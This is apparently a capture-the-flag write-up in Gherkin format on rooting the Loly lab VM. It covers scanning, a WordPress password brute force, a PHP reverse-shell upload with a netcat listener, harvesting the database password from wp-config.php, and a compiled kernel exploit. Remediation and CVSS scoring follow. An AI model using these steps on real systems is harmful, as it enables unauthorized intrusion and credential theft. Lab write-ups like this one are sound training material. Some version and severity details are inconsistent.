## Version 1.4.1
## language: en

Feature:
  TOE:
    loly-1
  Location:
    http://192.168.59.129/wordpress/
  CWE:
    CWE-269: Improper Privilege Management
    https://cwe.mitre.org/data/definitions/269.html
    CWE-553: Command Shell in Externally Accessible Directory
    https://cwe.mitre.org/data/definitions/553.html
    CWE-307: Improper Restriction of Excessive Authentication Attempts
    https://cwe.mitre.org/data/definitions/307.html
    CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
    https://cwe.mitre.org/data/definitions/200.html
  Rule:
    R186. Use the principle of least privilege
    https://fluidattacks.com/products/rules/list/186/
    R237. Ascertain human interaction
    https://fluidattacks.com/products/rules/list/237/
    R032. Avoid session ID leakages
    https://fluidattacks.com/products/rules/list/032/
  Goal:
    Get the root shell and then obtain flag under root
  Recommendation:
    Keep update Wordpress plugins and path OS Vulnerabilities

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | Gobuster        | 3.1.0     |
    | Nmap            | 7.9.1     |
    | Vmware 16 pro   | 16.1.0    |
    | Netcat          | 1.10-46   |
    | Searchsploit    | 4.1.3     |
    | Ruby            | 2.7.2p137 |
    | OpenSSH         | 8.4p1     |

  TOE information:
    Given a Loly OVA file
    When I run it on Vmware
    And I realize that it is a Linx Ubuntu 10.04.1 LTS
    And I see only a Ubuntu login session [evidence](1.png)
    Then I check the Virtual Machine IP address
    """
    arp -a
    192.168.59.129
    """
    Then I scan the IP with Nmap [evidence](2.png)
    And I can see 1 open port "80/tcp open http nginx 1.10.3 (Ubuntu)"

  Scenario: Normal use case
    Given the open port HTTP
    When I visit the IP address "192.168.59.129"
    And I realize that there is a website

  Scenario: Static detection
    Given the website
    When I perform a Gobuster scan [evidence](3.png)
    """
    gobuster dir -u http://192.168.59.129/ -w /usr/share/wordlists/dirb/big.txt
    """
    And I found a Wordpress website [evidence](4.png)

  Scenario: Dynamic detection
    Given the Wordpress website
    And I need to identify the users for this site
    And I perform a scan with Wpscan
    """
    wpscan --url http://192.168.59.129/wordpress/ --enumerate
    """
    And I got a user [evidence](5.png)

  Scenario: Exploitation
    Given I have the user for the Wordpress website
    Then I can perform a Bruteforce Attack to the user
    """
    wpscan --url http://192.168.59.129/wordpress/ -U loly -P rockyou.txt
    """
    And I found the password for the username "loly" [evidence](6.png)
    When I try to enter to "wp-admin"
    And I got a redirection to "http://loly.lc/" [evidence](7.png)
    Then I put the website "loly.lc" in my host file [evidence](8.png)
    And I got access to the admin login page [evidence](9.png)
    When I enter the credentials and I got access
    Then I got a warning about the plugin "AdRotate" [evidence](10.png)
    When I search for known vulnerabilities
    Then I found one "Exec Code Sql"
    And I can perform a Reverse Shell technique
    And I try to modify a reverse shell by default [evidence](11.png)
    """
    nano /usr/share/webshells/php/php-reverse-shell.php
    """
    Then I compress the shell in a ".zip" file
    """
    zip shell.zip shell.php
    """
    And I upload to the Wordpress website [evidence](12.png)
    And I put my "netcat port" to continuously listen
    """
    nc -nlvp 1234
    """
    Then I got reverse shell in the system [evidence](13.png)
    And I need to do Privilege escalation [evidence](14.png)
    """
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    """
    And I start to navigate into the fyle system [evidence](15.png)
    And I read the "wp-config.php" file
    When I see the file content
    Then I found the password [evidence](16.png)
    """
    /** MySQL database password */
    define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
    """
    And I have gain access to the user [evidence](17.png)
    Then I try to exploit Ubuntu 16.0.4.1 to gain root access
    """
    https://www.exploit-db.com/exploits/45010
    """
    And I download the exploit for this Version
    And I execute the exploit [evidence](18.png)
    """
    gcc -o 4 45010.c
    """
    Then I get root access [evidence](19.png)
    And I search the flag in the root directory
    And I found a file "root.txt"
    When I see the file
    """
    Congratulations. I'm BigCityBoy
    """
    And I got the flag [evidence](20.png)

  Scenario: Remediation
    When I do security test to the Wordpress Websites
    Then I can enforce the environment hardening
    And I can enforce a user and password control
    And I can update the PHP version for the Web Application
    Then I can update Wordpress and plugin version
    And I can keep in control the file ".htaccess"
    And I try to keep update OS version
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.5/10 (Critical) - AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (Critical) - E:P/RL:T/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.3/10 (Critical) - CR:M/IR:L/AR:L/MAV:X/MAC:X/MPR:X/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-07
